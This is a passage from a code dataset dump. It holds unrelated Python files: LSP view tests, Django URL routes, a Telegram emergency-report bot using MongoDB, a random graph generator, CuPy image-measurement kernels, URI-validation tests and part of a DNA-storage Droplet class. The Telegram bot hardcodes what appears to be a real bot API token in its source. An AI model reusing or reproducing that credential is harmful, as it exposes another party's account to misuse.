'\n ])\n allowed_formats = FORMAT_MARKED_STRING | FORMAT_MARKUP_CONTENT\n formatted = self._strip_style_attributes(minihtml(self.view, content, allowed_formats=allowed_formats))\n self.assertEqual(formatted, expect)\n\n def test_minihtml_ignores_non_allowed_string(self) -> None:\n content = \"
<div>text\\n</div>
\"\n expect = \"\"\n self.assertEqual(minihtml(self.view, content, allowed_formats=FORMAT_MARKUP_CONTENT), expect)\n\n def test_minihtml_ignores_non_allowed_marked_string(self) -> None:\n content = {'value': 'import sys', 'language': 'python'}\n expect = \"\"\n self.assertEqual(minihtml(self.view, content, allowed_formats=FORMAT_MARKUP_CONTENT), expect)\n\n def test_minihtml_ignores_non_allowed_marked_string_array(self) -> None:\n content = [\"a\", \"b\"]\n expect = \"\"\n self.assertEqual(minihtml(self.view, content, allowed_formats=FORMAT_MARKUP_CONTENT), expect)\n\n def test_minihtml_ignores_non_allowed_markup_content(self) -> None:\n content = {'value': 'ab', 'kind': 'plaintext'}\n expect = \"\"\n self.assertEqual(minihtml(self.view, content, allowed_formats=FORMAT_STRING), expect)\n\n def test_minihtml_magiclinks(self) -> None:\n content = {'value': 'https://github.com/sublimelsp/LSP', 'kind': 'markdown'}\n expect_attributes = [\n 'class=\"magiclink magiclink-github magiclink-repository\"',\n 'href=\"https://github.com/sublimelsp/LSP\"',\n 'title=\"GitHub Repository: sublimelsp/LSP\"'\n ]\n expect = '

sublimelsp/LSP

'.format(' '.join(expect_attributes))\n self.assertEqual(minihtml(self.view, content, allowed_formats=FORMAT_MARKUP_CONTENT), expect)\n\n def _strip_style_attributes(self, content: str) -> str:\n return re.sub(r'\\s+style=\"[^\"]+\"', '', content)\n\n def test_text2html_replaces_tabs_with_br(self) -> None:\n self.assertEqual(text2html(\"Hello,\\t world \"), \"Hello,&nbsp;&nbsp;&nbsp;&nbsp; world \")\n\n def test_text2html_non_breaking_space_and_control_char_with_entity(self) -> None:\n self.assertEqual(text2html(\"no\\xc2\\xa0breaks\"), \"no&#xc2;&nbsp;breaks\")\n\n def test_text2html_replaces_two_or_more_spaces_with_nbsp(self) -> None:\n content = \" One  Two   Three One    Four\"\n expect = \" One&nbsp;&nbsp;Two&nbsp;&nbsp;&nbsp;Three One&nbsp;&nbsp;&nbsp;&nbsp;Four\"\n self.assertEqual(text2html(content), expect)\n\n def test_text2html_does_not_replace_one_space_with_nbsp(self) -> None:\n content = \" John has one apple \"\n self.assertEqual(text2html(content), content)\n\n def test_text2html_replaces_newlines_with_br(self) -> None:\n self.assertEqual(text2html(\"a\\nb\"), \"a<br>b\")\n\n
def test_text2html_parses_link_simple(self) -> None:\n content = \"https://github.com/sublimelsp/LSP\"\n expect = \"<a href='https://github.com/sublimelsp/LSP'>https://github.com/sublimelsp/LSP</a>\"\n self.assertEqual(text2html(content), expect)\n\n def test_text2html_parses_link_in_angle_brackets(self) -> None:\n content = \"<https://github.com/sublimelsp/LSP>\"\n expect = \"&lt;<a href='https://github.com/sublimelsp/LSP'>https://github.com/sublimelsp/LSP</a>&gt;\"\n self.assertEqual(text2html(content), expect)\n\n def test_text2html_parses_link_in_double_quotes(self) -> None:\n content = \"\\\"https://github.com/sublimelsp/LSP\\\"\"\n expect = \"\\\"<a href='https://github.com/sublimelsp/LSP'>https://github.com/sublimelsp/LSP</a>\\\"\"\n self.assertEqual(text2html(content), expect)\n\n def test_text2html_parses_link_in_single_quotes(self) -> None:\n content = \"'https://github.com/sublimelsp/LSP'\"\n expect = \"'<a href='https://github.com/sublimelsp/LSP'>https://github.com/sublimelsp/LSP</a>'\"\n self.assertEqual(text2html(content), expect)\n\n
def test_lsp_color_to_phantom(self) -> None:\n response = [\n {\n \"color\": {\n \"green\": 0.9725490196078431,\n \"blue\": 1,\n \"red\": 0.9411764705882353,\n \"alpha\": 1\n },\n \"range\": {\n \"start\": {\n \"character\": 0,\n \"line\": 0\n },\n \"end\": {\n \"character\": 5,\n \"line\": 0\n }\n }\n }\n ]\n phantom = lsp_color_to_phantom(self.view, response[0])\n self.assertEqual(phantom.content, lsp_color_to_html(response[0]))\n self.assertEqual(phantom.region, range_to_region(response[0][\"range\"], self.view))\n\n def test_document_color_params(self) -> None:\n self.view.settings().set(\"lsp_uri\", filename_to_uri(self.mock_file_name))\n self.assertEqual(\n document_color_params(self.view),\n {\"textDocument\": {\"uri\": filename_to_uri(self.mock_file_name)}})\n\n
def test_text_document_code_action_params(self) -> None:\n self.view.settings().set(\"lsp_uri\", filename_to_uri(self.mock_file_name))\n diagnostic = {\n \"message\": \"oops\",\n \"severity\": DiagnosticSeverity.Error,\n \"range\": {\n \"start\": {\n \"character\": 0,\n \"line\": 0\n },\n \"end\": {\n \"character\": 1,\n \"line\": 0\n }\n }\n } # type: Diagnostic\n self.view.run_command(\"append\", {\"characters\": \"a b c\\n\"})\n params = text_document_code_action_params(\n view=self.view,\n region=sublime.Region(0, 1),\n diagnostics=[diagnostic],\n only_kinds=[CodeActionKind.Refactor]\n )\n self.assertEqual(params[\"textDocument\"], {\"uri\": filename_to_uri(self.mock_file_name)})\n\n
def test_format_diagnostic_for_html(self) -> None:\n diagnostic1 = {\n \"message\": \"oops\",\n \"severity\": DiagnosticSeverity.Error,\n # The relatedInformation is present here, but it's an empty list.\n # This should have the same behavior as having no relatedInformation present.\n \"relatedInformation\": [],\n \"range\": {\n \"start\": {\n \"character\": 0,\n \"line\": 0\n },\n \"end\": {\n \"character\": 5,\n \"line\": 0\n }\n }\n } # type: Diagnostic\n # Make the same diagnostic but without the relatedInformation\n diagnostic2 = deepcopy(diagnostic1)\n diagnostic2.pop(\"relatedInformation\")\n self.assertIn(\"relatedInformation\", diagnostic1)\n self.assertNotIn(\"relatedInformation\", diagnostic2)\n client_config = make_stdio_test_config()\n # They should result in the same minihtml.\n self.assertEqual(\n format_diagnostic_for_html(client_config, diagnostic1, \"/foo/bar\"),\n format_diagnostic_for_html(client_config, diagnostic2, \"/foo/bar\")\n )\n\n def test_escaped_newline_in_markdown(self) -> None:\n self.assertEqual(\n minihtml(self.view, {\"kind\": \"markdown\", \"value\": \"hello\\\\\\nworld\"}, FORMAT_MARKUP_CONTENT),\n \"
<p>hello\\\\\\nworld</p>
\"\n )\n\n def test_single_backslash_in_markdown(self) -> None:\n self.assertEqual(\n minihtml(self.view, {\"kind\": \"markdown\", \"value\": \"A\\\\B\"}, FORMAT_MARKUP_CONTENT),\n \"

A\\\\B

\"\n )\n","sub_path":"tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":18682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"62494517","text":"from django.conf.urls import patterns, include, url\n\nfrom opal.urls import urlpatterns as opatterns\nfrom mir import api\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns(\n '',\n url(r'^admin/', include(admin.site.urls)),\n url(\n r'^mir/incident/(?P[0-9]+)$',\n api.MirApi.as_view({\n 'get': 'retrieve'\n }),\n name=\"mir_api\"\n ),\n)\n\nurlpatterns += opatterns\n","sub_path":"mir/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"576471059","text":"import time\nfrom pymongo import MongoClient\nimport gridfs\nimport telebot\nfrom telebot import types\n\ntoken = '504695669:AAEJ_QdTIbkeBFLdRZ77f7quniZty7iAN0U'\nbot = telebot.TeleBot(token)\nalarms={}\nkeyboard = types.ReplyKeyboardMarkup(resize_keyboard=True)\nkeyboard.add(types.KeyboardButton(text=\"cancel\"))\nkeyboard.add(types.KeyboardButton(text=\"end\"))\nkeyboard.add(types.KeyboardButton(text=\"location\",request_location=True))\nkeyboard.add(types.KeyboardButton(text=\"alarm\"))\n\nclient = MongoClient()\ndb = client.alarms\nfs = gridfs.GridFS(db)\ndef download_files(old):\n\tnew={}\n\tnew.update({'location':old.pop('location')})\n\tif 'text' in old:\n\t\tnew.update({'text':\" \".join(old.pop('text'))})\n\tfor file_type in old:\n\t\tnew.update({file_type:[] })\n\t\tfor file_id in old[file_type]:\n\t\t\t\tfile_info = bot.get_file(file_id)\n\t\t\t\tdownloaded_file = bot.download_file(file_info.file_path)\n\t\t\t\tOid=fs.put(downloaded_file,filename=file_info.file_path.split('/')[-1])\n\t\t\t\tnew[file_type].append(Oid)\n\treturn new\n@bot.message_handler(commands=['start','help'])\ndef handle_commands(message):\n\t\talarmed=False\n\t\tif message.chat.id in alarms:\n\t\t\talarmed=True\n\n\t\tif message.text==\"/start\":\n\t\t\tbot.send_message(message.chat.id, \"Добро пожаловать /alarm - для вызова помощи!\",reply_markup=keyboard)\n\t\telif message.text==\"/help\":\n\t\t\tbot.send_message(message.chat.id, \"Управление кнопками\")\n\t\t\n\n\n@bot.message_handler(content_types=[\"text\"])\ndef text_messages(message): \n\t\talarmed=False\n\t\tif message.chat.id in alarms:\n\t\t\talarmed=True\n\t\tif message.text==\"alarm\":\n\t\t\t\tif not alarmed:\n\t\t\t\t\talarms.update({message.chat.id:{}})\n\t\t\t\t\tbot.send_message(message.chat.id, \"Расскажите,что случилось!\")\n\t\t\t\telse:\n\t\t\t\t\tbot.send_message(message.chat.id, \"Да,да, продолжайте!\")\n\n\t\telif message.text==\"cancel\":\n\t\t\tif alarmed:\n\t\t\t\talarms.pop(message.chat.id,None)\n\t\t\t\tbot.send_message(message.chat.id, \"Берегите себя!\")\n\n\t\telif message.text==\"end\":\n\t\t\tif alarmed:\n\n\t\t\t\tif \"location\" not in alarms[message.chat.id] :\n\t\t\t\t\tbot.send_message(message.chat.id, \"Нам необходима ваша позиция!\")\n\t\t\t\telse:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tdb.alarms.insert(download_files(alarms.pop(message.chat.id)))\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\tprint(e)\n\t\t\t\t\tbot.send_message(message.chat.id, \"Держитесь,к вам уже едут!!\")\n\t\t\t\t\t\n\t\t\t\t\t\n\t\telif alarmed:\n\t\t\tif \"text\" not in 
alarms[message.chat.id]:\n\t\t\t\talarms[message.chat.id].update({\"text\":[]})\n\t\t\talarms[message.chat.id]['text'].append(message.text)\n\t\t\t\n\n\n#@bot.message_handler(content_types=['document'])\n#def doc_messages(message):\n\t#if message.chat.id in alarms:\n\t\t\t#alarms[message.chat.id].update({\"document\":[]})\n\t#alarms[message.chat.id][\"document\"].append(message.document.file_id)\n\n\n\n@bot.message_handler(content_types=[\"voice\"])\ndef doc_messages(message):\n\tif message.chat.id in alarms:\n\t\tif \"voice\" not in alarms[message.chat.id]:\n\t\t\talarms[message.chat.id].update({\"voice\":[]})\n\t\talarms[message.chat.id][\"voice\"].append(message.voice.file_id)\n\n\n@bot.message_handler(content_types=['photo'])\ndef img_messages(message):\n\tif message.chat.id in alarms:\n\t\tif \"photo\" not in alarms[message.chat.id]:\n\t\t\talarms[message.chat.id].update({\"photo\":[]})\n\t\talarms[message.chat.id]['photo'].append(message.photo[-1].file_id)\n\n\n@bot.message_handler(content_types=[\"location\"])\ndef loc_messages(message): # Название функции не играет никакой роли, в принципе\n\tif message.chat.id in alarms and message.text!=\"alarm\" :\n\t\tif \"location\" not in alarms[message.chat.id]:\n\t\t\talarms[message.chat.id].update({\"location\":[]})\n\t\t\talarms[message.chat.id]['location'].append((message.location.latitude,message.location.longitude))\nif __name__ == '__main__':\n\t\ttry:\n\t\t\tbot.polling(none_stop=True)\n\t\texcept Exception as e:\n\t\t\twith open('c_crashlog.txt', 'w') as f:\n\t\t\t\tf.write(str(e))\n\t\t","sub_path":"client_bot.py","file_name":"client_bot.py","file_ext":"py","file_size_in_byte":3920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"475093537","text":"import random\n\nn = 150\n\ndag_matrix = [[0 for i in range(n)] for t in range(n)]\nodd_vertex = []\n\nedges = int(n * (n - 1) * 0.6)\n\nlos = 0\n\nwhile (edges != 0):\n for i in range(n):\n if (edges != 0 and i + 1 < n):\n dag_matrix[i][i+1] = 1\n #dag_matrix[i+1][i] = 1\n edges -= 1\n for i in range(n):\n for t in range(i+1, n):\n if (edges != 0):\n los = random.randint(0, 1)\n\n if (los == 1 and dag_matrix[i][t] == 0):\n dag_matrix[i][t] = los\n #dag_matrix[t][i] = los\n edges -= 1\n\n\n\n\ndane = open('file.txt', 'w')\ndane.write(str(n))\ndane.write(\"\\n\")\n\nfor i in range(n):\n for t in range(n):\n if(dag_matrix[i][t] == 1):\n dane.write(str(i + 1))\n dane.write(\" \")\n dane.write(str(t + 1))\n dane.write(\"\\n\")\n\ndane.close()\n\n\n\n\n","sub_path":"generatorGrafu.py","file_name":"generatorGrafu.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"343669567","text":"import warnings\n\nimport numpy\n\nimport cupy\nfrom cupy import core\nfrom cupy import _util\n\n\ndef label(input, structure=None, output=None):\n \"\"\"Labels features in an array.\n\n Args:\n input (cupy.ndarray): The input array.\n structure (array_like or None): A structuring element that defines\n feature connections. ```structure``` must be centersymmetric. If\n None, structure is automatically generated with a squared\n connectivity equal to one.\n output (cupy.ndarray, dtype or None): The array in which to place the\n output.\n Returns:\n label (cupy.ndarray): An integer array where each unique feature in\n ```input``` has a unique label in the array.\n\n num_features (int): Number of features found.\n\n .. 
warning::\n\n This function may synchronize the device.\n\n .. seealso:: :func:`scipy.ndimage.label`\n \"\"\"\n if not isinstance(input, cupy.ndarray):\n raise TypeError('input must be cupy.ndarray')\n if input.dtype.char in 'FD':\n raise TypeError('Complex type not supported')\n if structure is None:\n structure = _generate_binary_structure(input.ndim, 1)\n elif isinstance(structure, cupy.ndarray):\n structure = cupy.asnumpy(structure)\n structure = numpy.array(structure, dtype=bool)\n if structure.ndim != input.ndim:\n raise RuntimeError('structure and input must have equal rank')\n for i in structure.shape:\n if i != 3:\n raise ValueError('structure dimensions must be equal to 3')\n\n if isinstance(output, cupy.ndarray):\n if output.shape != input.shape:\n raise ValueError(\"output shape not correct\")\n caller_provided_output = True\n else:\n caller_provided_output = False\n if output is None:\n output = cupy.empty(input.shape, numpy.int32)\n else:\n output = cupy.empty(input.shape, output)\n\n if input.size == 0:\n # empty\n maxlabel = 0\n elif input.ndim == 0:\n # 0-dim array\n maxlabel = 0 if input.item() == 0 else 1\n output[...] = maxlabel\n else:\n if output.dtype != numpy.int32:\n y = cupy.empty(input.shape, numpy.int32)\n else:\n y = output\n maxlabel = _label(input, structure, y)\n if output.dtype != numpy.int32:\n output[...] = y[...]\n\n if caller_provided_output:\n return maxlabel\n else:\n return output, maxlabel\n\n\ndef _generate_binary_structure(rank, connectivity):\n if connectivity < 1:\n connectivity = 1\n if rank < 1:\n return numpy.array(True, dtype=bool)\n output = numpy.fabs(numpy.indices([3] * rank) - 1)\n output = numpy.add.reduce(output, 0)\n return output <= connectivity\n\n\ndef _label(x, structure, y):\n elems = numpy.where(structure != 0)\n vecs = [elems[dm] - 1 for dm in range(x.ndim)]\n offset = vecs[0]\n for dm in range(1, x.ndim):\n offset = offset * 3 + vecs[dm]\n indxs = numpy.where(offset < 0)[0]\n dirs = [[vecs[dm][dr] for dm in range(x.ndim)] for dr in indxs]\n dirs = cupy.array(dirs, dtype=numpy.int32)\n ndirs = indxs.shape[0]\n y_shape = cupy.array(y.shape, dtype=numpy.int32)\n count = cupy.zeros(2, dtype=numpy.int32)\n _kernel_init()(x, y)\n _kernel_connect()(y_shape, dirs, ndirs, x.ndim, y, size=y.size)\n _kernel_count()(y, count, size=y.size)\n maxlabel = int(count[0])\n labels = cupy.empty(maxlabel, dtype=numpy.int32)\n _kernel_labels()(y, count, labels, size=y.size)\n _kernel_finalize()(maxlabel, cupy.sort(labels), y, size=y.size)\n return maxlabel\n\n\ndef _kernel_init():\n return core.ElementwiseKernel(\n 'X x', 'Y y', 'if (x == 0) { y = -1; } else { y = i; }',\n 'cupyx_nd_label_init')\n\n\ndef _kernel_connect():\n return core.ElementwiseKernel(\n 'raw int32 shape, raw int32 dirs, int32 ndirs, int32 ndim',\n 'raw Y y',\n '''\n if (y[i] < 0) continue;\n for (int dr = 0; dr < ndirs; dr++) {\n int j = i;\n int rest = j;\n int stride = 1;\n int k = 0;\n for (int dm = ndim-1; dm >= 0; dm--) {\n int pos = rest % shape[dm] + dirs[dm + dr * ndim];\n if (pos < 0 || pos >= shape[dm]) {\n k = -1;\n break;\n }\n k += pos * stride;\n rest /= shape[dm];\n stride *= shape[dm];\n }\n if (k < 0) continue;\n if (y[k] < 0) continue;\n while (1) {\n while (j != y[j]) { j = y[j]; }\n while (k != y[k]) { k = y[k]; }\n if (j == k) break;\n if (j < k) {\n int old = atomicCAS( &y[k], k, j );\n if (old == k) break;\n k = old;\n }\n else {\n int old = atomicCAS( &y[j], j, k );\n if (old == j) break;\n j = old;\n }\n }\n }\n ''',\n 'cupyx_nd_label_connect')\n\n\ndef 
_kernel_count():\n return core.ElementwiseKernel(\n '', 'raw Y y, raw int32 count',\n '''\n if (y[i] < 0) continue;\n int j = i;\n while (j != y[j]) { j = y[j]; }\n if (j != i) y[i] = j;\n else atomicAdd(&count[0], 1);\n ''',\n 'cupyx_nd_label_count')\n\n\ndef _kernel_labels():\n return core.ElementwiseKernel(\n '', 'raw Y y, raw int32 count, raw int32 labels',\n '''\n if (y[i] != i) continue;\n int j = atomicAdd(&count[1], 1);\n labels[j] = i;\n ''',\n 'cupyx_nd_label_labels')\n\n\ndef _kernel_finalize():\n return core.ElementwiseKernel(\n 'int32 maxlabel', 'raw int32 labels, raw Y y',\n '''\n if (y[i] < 0) {\n y[i] = 0;\n continue;\n }\n int yi = y[i];\n int j_min = 0;\n int j_max = maxlabel - 1;\n int j = (j_min + j_max) / 2;\n while (j_min < j_max) {\n if (yi == labels[j]) break;\n if (yi < labels[j]) j_max = j - 1;\n else j_min = j + 1;\n j = (j_min + j_max) / 2;\n }\n y[i] = j + 1;\n ''',\n 'cupyx_nd_label_finalize')\n\n\n_ndimage_variance_kernel = core.ElementwiseKernel(\n 'T input, R labels, raw X index, uint64 size, raw float64 mean',\n 'raw float64 out',\n \"\"\"\n for (ptrdiff_t j = 0; j < size; j++) {\n if (labels == index[j]) {\n atomicAdd(&out[j], (input - mean[j]) * (input - mean[j]));\n break;\n }\n }\n \"\"\")\n\n\n_ndimage_sum_kernel = core.ElementwiseKernel(\n 'T input, R labels, raw X index, uint64 size',\n 'raw float64 out',\n \"\"\"\n for (ptrdiff_t j = 0; j < size; j++) {\n if (labels == index[j]) {\n atomicAdd(&out[j], input);\n break;\n }\n }\n \"\"\")\n\n\ndef _ndimage_sum_kernel_2(input, labels, index, sum_val, batch_size=4):\n for i in range(0, index.size, batch_size):\n matched = labels == index[i:i + batch_size].reshape(\n (-1,) + (1,) * input.ndim)\n sum_axes = tuple(range(1, 1 + input.ndim))\n sum_val[i:i + batch_size] = cupy.where(matched, input, 0).sum(\n axis=sum_axes)\n return sum_val\n\n\n_ndimage_mean_kernel = core.ElementwiseKernel(\n 'T input, R labels, raw X index, uint64 size',\n 'raw float64 out, raw uint64 count',\n \"\"\"\n for (ptrdiff_t j = 0; j < size; j++) {\n if (labels == index[j]) {\n atomicAdd(&out[j], input);\n atomicAdd(&count[j], 1);\n break;\n }\n }\n \"\"\")\n\n\ndef _ndimage_mean_kernel_2(input, labels, index, batch_size=4,\n return_count=False):\n sum_val = cupy.empty_like(index, dtype=cupy.float64)\n count = cupy.empty_like(index, dtype=cupy.uint64)\n for i in range(0, index.size, batch_size):\n matched = labels == index[i:i + batch_size].reshape(\n (-1,) + (1,) * input.ndim)\n mean_axes = tuple(range(1, 1 + input.ndim))\n count[i:i + batch_size] = matched.sum(axis=mean_axes)\n sum_val[i:i + batch_size] = cupy.where(matched, input, 0).sum(\n axis=mean_axes)\n if return_count:\n return sum_val / count, count\n return sum_val / count\n\n\ndef _mean_driver(input, labels, index, return_count=False, use_kern=False):\n if use_kern:\n return _ndimage_mean_kernel_2(input, labels, index,\n return_count=return_count)\n\n out = cupy.zeros_like(index, cupy.float64)\n count = cupy.zeros_like(index, dtype=cupy.uint64)\n sum, count = _ndimage_mean_kernel(input,\n labels, index, index.size, out, count)\n if return_count:\n return sum / count, count\n return sum / count\n\n\ndef variance(input, labels=None, index=None):\n \"\"\"Calculates the variance of the values of an n-D image array, optionally\n at specified sub-regions.\n\n Args:\n input (cupy.ndarray): Nd-image data to process.\n labels (cupy.ndarray or None): Labels defining sub-regions in `input`.\n If not None, must be same shape as `input`.\n index (cupy.ndarray or None): `labels` to 
include in output. If None\n (default), all values where `labels` is non-zero are used.\n\n Returns:\n variance (cupy.ndarray): Values of variance, for each sub-region if\n `labels` and `index` are specified.\n\n .. seealso:: :func:`scipy.ndimage.variance`\n \"\"\"\n if not isinstance(input, cupy.ndarray):\n raise TypeError('input must be cupy.ndarray')\n\n if input.dtype in (cupy.complex64, cupy.complex128):\n raise TypeError(\"cupyx.scipy.ndimage.variance doesn't support %{}\"\n \"\".format(input.dtype.type))\n\n use_kern = False\n # There is constraints on types because of atomicAdd() in CUDA.\n if input.dtype not in [cupy.int32, cupy.float16, cupy.float32,\n cupy.float64, cupy.uint32, cupy.uint64,\n cupy.ulonglong]:\n warnings.warn(\n 'Using the slower implmentation as '\n 'cupyx.scipy.ndimage.sum supports int32, float16, '\n 'float32, float64, uint32, uint64 as data types'\n 'for the fast implmentation', _util.PerformanceWarning)\n use_kern = True\n\n def calc_var_with_intermediate_float(input):\n vals_c = input - input.mean()\n count = vals_c.size\n # Does not use `ndarray.mean()` here to return the same results as\n # SciPy does, especially in case `input`'s dtype is float16.\n return cupy.square(vals_c).sum() / cupy.asanyarray(count).astype(float)\n\n if labels is None:\n return calc_var_with_intermediate_float(input)\n\n if not isinstance(labels, cupy.ndarray):\n raise TypeError('label must be cupy.ndarray')\n\n if index is None:\n return calc_var_with_intermediate_float(input[labels > 0])\n\n if cupy.isscalar(index):\n return calc_var_with_intermediate_float(input[labels == index])\n\n input, labels = cupy.broadcast_arrays(input, labels)\n\n if not isinstance(index, cupy.ndarray):\n if not isinstance(index, int):\n raise TypeError('index must be cupy.ndarray or a scalar int')\n else:\n return (input[labels == index]).var().astype(cupy.float64,\n copy=False)\n\n mean_val, count = _mean_driver(input, labels, index, True, use_kern)\n if use_kern:\n new_axis = (..., *(cupy.newaxis for _ in range(input.ndim)))\n return cupy.where(labels[None, ...] == index[new_axis],\n cupy.square(input - mean_val[new_axis]),\n 0).sum(tuple(range(1, input.ndim + 1))) / count\n out = cupy.zeros_like(index, dtype=cupy.float64)\n return _ndimage_variance_kernel(input, labels, index, index.size, mean_val,\n out) / count\n\n\ndef sum(input, labels=None, index=None):\n \"\"\"Calculates the sum of the values of an n-D image array, optionally\n at specified sub-regions.\n\n Args:\n input (cupy.ndarray): Nd-image data to process.\n labels (cupy.ndarray or None): Labels defining sub-regions in `input`.\n If not None, must be same shape as `input`.\n index (cupy.ndarray or None): `labels` to include in output. If None\n (default), all values where `labels` is non-zero are used.\n\n Returns:\n sum (cupy.ndarray): sum of values, for each sub-region if\n `labels` and `index` are specified.\n\n .. 
seealso:: :func:`scipy.ndimage.sum`\n \"\"\"\n if not isinstance(input, cupy.ndarray):\n raise TypeError('input must be cupy.ndarray')\n\n if input.dtype in (cupy.complex64, cupy.complex128):\n raise TypeError(\"cupyx.scipy.ndimage.sum doesnt support %{}\".format(\n input.dtype.type))\n\n use_kern = False\n # There is constraints on types because of atomicAdd() in CUDA.\n if input.dtype not in [cupy.int32, cupy.float16, cupy.float32,\n cupy.float64, cupy.uint32, cupy.uint64,\n cupy.ulonglong]:\n warnings.warn(\n 'Using the slower implmentation as '\n 'cupyx.scipy.ndimage.sum supports int32, float16, '\n 'float32, float64, uint32, uint64 as data types'\n 'for the fast implmentation', _util.PerformanceWarning)\n use_kern = True\n\n if labels is None:\n return input.sum()\n\n if not isinstance(labels, cupy.ndarray):\n raise TypeError('label must be cupy.ndarray')\n\n if index is None:\n return input[labels != 0].sum()\n\n input, labels = cupy.broadcast_arrays(input, labels)\n\n if not isinstance(index, cupy.ndarray):\n if not isinstance(index, int):\n raise TypeError('index must be cupy.ndarray or a scalar int')\n else:\n return (input[labels == index]).sum()\n\n if index.size == 0:\n return cupy.array([], dtype=cupy.int64)\n\n out = cupy.zeros_like(index, dtype=cupy.float64)\n\n # The following parameters for sum where determined using a Tesla P100.\n if (input.size >= 262144 and index.size <= 4) or use_kern:\n return _ndimage_sum_kernel_2(input, labels, index, out)\n return _ndimage_sum_kernel(input, labels, index, index.size, out)\n\n\ndef mean(input, labels=None, index=None):\n \"\"\"Calculates the mean of the values of an n-D image array, optionally\n at specified sub-regions.\n\n Args:\n input (cupy.ndarray): Nd-image data to process.\n labels (cupy.ndarray or None): Labels defining sub-regions in `input`.\n If not None, must be same shape as `input`.\n index (cupy.ndarray or None): `labels` to include in output. If None\n (default), all values where `labels` is non-zero are used.\n\n Returns:\n mean (cupy.ndarray): mean of values, for each sub-region if\n `labels` and `index` are specified.\n\n\n .. 
seealso:: :func:`scipy.ndimage.mean`\n \"\"\"\n if not isinstance(input, cupy.ndarray):\n raise TypeError('input must be cupy.ndarray')\n\n if input.dtype in (cupy.complex64, cupy.complex128):\n raise TypeError(\"cupyx.scipy.ndimage.mean doesnt support %{}\".format(\n input.dtype.type))\n\n use_kern = False\n # There is constraints on types because of atomicAdd() in CUDA.\n if input.dtype not in [cupy.int32, cupy.float16, cupy.float32,\n cupy.float64, cupy.uint32, cupy.uint64,\n cupy.ulonglong]:\n warnings.warn(\n 'Using the slower implmentation as '\n 'cupyx.scipy.ndimage.mean supports int32, float16, '\n 'float32, float64, uint32, uint64 as data types '\n 'for the fast implmentation', _util.PerformanceWarning)\n use_kern = True\n\n def calc_mean_with_intermediate_float(input):\n sum = input.sum()\n count = input.size\n # Does not use `ndarray.mean()` here to return the same results as\n # SciPy does, especially in case `input`'s dtype is float16.\n return sum / cupy.asanyarray(count).astype(float)\n\n if labels is None:\n return calc_mean_with_intermediate_float(input)\n\n if not isinstance(labels, cupy.ndarray):\n raise TypeError('label must be cupy.ndarray')\n\n if index is None:\n return calc_mean_with_intermediate_float(input[labels > 0])\n\n if cupy.isscalar(index):\n return calc_mean_with_intermediate_float(input[labels == index])\n\n input, labels = cupy.broadcast_arrays(input, labels)\n\n if not isinstance(index, cupy.ndarray):\n if not isinstance(index, int):\n raise TypeError('index must be cupy.ndarray or a scalar int')\n else:\n return (input[labels == index]).mean(dtype=cupy.float64)\n\n return _mean_driver(input, labels, index, use_kern=use_kern)\n\n\ndef standard_deviation(input, labels=None, index=None):\n \"\"\"Calculates the standard deviation of the values of an n-D image array,\n optionally at specified sub-regions.\n\n Args:\n input (cupy.ndarray): Nd-image data to process.\n labels (cupy.ndarray or None): Labels defining sub-regions in `input`.\n If not None, must be same shape as `input`.\n index (cupy.ndarray or None): `labels` to include in output. If None\n (default), all values where `labels` is non-zero are used.\n\n Returns:\n standard_deviation (cupy.ndarray): standard deviation of values, for\n each sub-region if `labels` and `index` are specified.\n\n .. 
seealso:: :func:`scipy.ndimage.standard_deviation`\n \"\"\"\n return cupy.sqrt(variance(input, labels, index))\n","sub_path":"cupyx/scipy/ndimage/measurements.py","file_name":"measurements.py","file_ext":"py","file_size_in_byte":17725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"156936972","text":"import pytest\n\nfrom gata.errors import ValidationError\nfrom gata.validators import validate_uri\n\n\n@pytest.mark.parametrize(\n \"value\",\n (\n \"http://foo.com/blah_blah\",\n \"http://foo.com/blah_blah/\",\n \"https://www.example.com/foo/?bar=baz&inga=42&quux\",\n \"http://userid:password@example.com\",\n \"http://142.42.1.1:8080/\",\n \"http://142.42.1.1/\",\n \"http://code.google.com/events/#&product=browser\",\n \"http://a.b-c.de\",\n \"https://foo_bar.example.com/\",\n \"http://jabber.tcp.gmail.com\",\n \"http://_jabber._tcp.gmail.com\",\n \"http://مثال.إختبار\",\n ),\n)\ndef test_validate_uri_valid_values(value: str):\n assert validate_uri(value)\n\n\n@pytest.mark.parametrize(\n \"value\",\n (\n \"aaaa\",\n \"...\",\n \"####/3s\"\n ),\n)\ndef test_validate_uri_invalid_values(value: str):\n with pytest.raises(ValidationError):\n validate_uri(value)\n","sub_path":"tests/validators/test_validate_uri.py","file_name":"test_validate_uri.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"195515670","text":"import struct\nimport random\nimport os\nimport numpy as np\nimport logging\nimport sys\nimport operator\nfrom reedsolo import RSCodec\nimport numpy as np\nimport scipy.interpolate as inter\nimport math\nimport pprint\nfrom Helper_Functions import *\nfrom RPNG import *\nimport csv\nfrom copy import deepcopy\nimport json\nprocess = 0\n\n\n# ----------------------------------------------------Droplet-------------------------------------------------#\nclass Droplet:\n def __init__(self, data, seed, num_chunks=None, rs=0, rs_obj=None, degree=None):\n # num_chunks is a list of the orignal packets numbers used to xor\n # rs is the number of Reed Solomon symbols to add to the message\n\n self.data = data\n self.seed = seed\n self.num_chunks = set(num_chunks)\n self.rs = rs\n self.rs_obj = rs_obj\n self.degree = degree\n\n self.DNA = None\n\n def toDNA(self, flag=None):\n # this function wraps the seed, data payload, and Reed Solomon.\n if self.DNA is not None:\n return self.DNA\n self.DNA = byte_to_dna(self._package())\n return self.DNA\n\n def chunkStr(self):\n num = 0\n s = ''\n for i in self.num_chunks:\n if (6 == num):\n s += '...'\n break\n s += str(i) + ' '\n num += 1\n return s\n\n def _package(self):\n # this function converts the 